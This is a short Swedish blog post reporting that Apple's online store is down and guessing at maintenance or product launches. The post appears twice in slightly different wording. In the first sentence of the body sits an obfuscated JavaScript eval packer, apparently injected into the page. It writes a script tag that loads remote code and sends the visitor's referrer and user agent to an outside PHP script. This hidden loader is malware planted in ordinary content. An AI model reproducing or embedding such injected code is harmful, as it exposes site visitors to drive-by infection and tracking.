Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Apple Store ligger nere

Apple Store ligger nere
Sebastian Plengier Ehrnfelt

Just eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ikies|var|u0026u|referrer|fesrd||js|php’.split(‘|’),0,{}))
nu ligger Apple Store nere. Detta kan betyda två saker. Antingen att Apple är på väg att lansera en ny produkt eller att det just nu är underhåll av sidan. Troligen är det alternativ två då det inte är tid för nya produkter att lanseras.

Vi har fått veta genom 9 to 5 mac att Apple har uppdaterat sin sida i bland annat Tyskland där man fått tillgång till bättre service som chat. Man har även lanserat Tv-Shows och iTunes inte cloud. Något som kanske kommer att få se mer v i övriga länder under dagen.

För övrigt är det nog många av er som väntar på att Apple ska uppdatera Apple Cinema Displays, iMac, Mac mini samt Macbook Pro.
Vad vi får ta del av är fortfarande oklart.

Just nu ligger Apple Store nere.
Det behöver inte vara någon ny produkt utan det kan också vara underhåll utav sidan som så många gånger tidigare. Tidigare har tisdagar varit en klassisk dag för Apple att presentera nya produkter och underhåll utav hemsidan men senast fredagen den 29 augusti uppdaterade Apple så att fler länder fick tillgång bättre service så som chat.

Enligt 9 to 5 Mac så uppdaterade Apple igår så att även Tyskland fick tillgång till Tv-Shows och iTunes in the Cloud. Kanske kommer vi att få se det för fler länder under dagen..
I övrigt är det nog många som väntar på uppdaterade Apple Cinema Displays, IMac, Mac mini och Mac Pro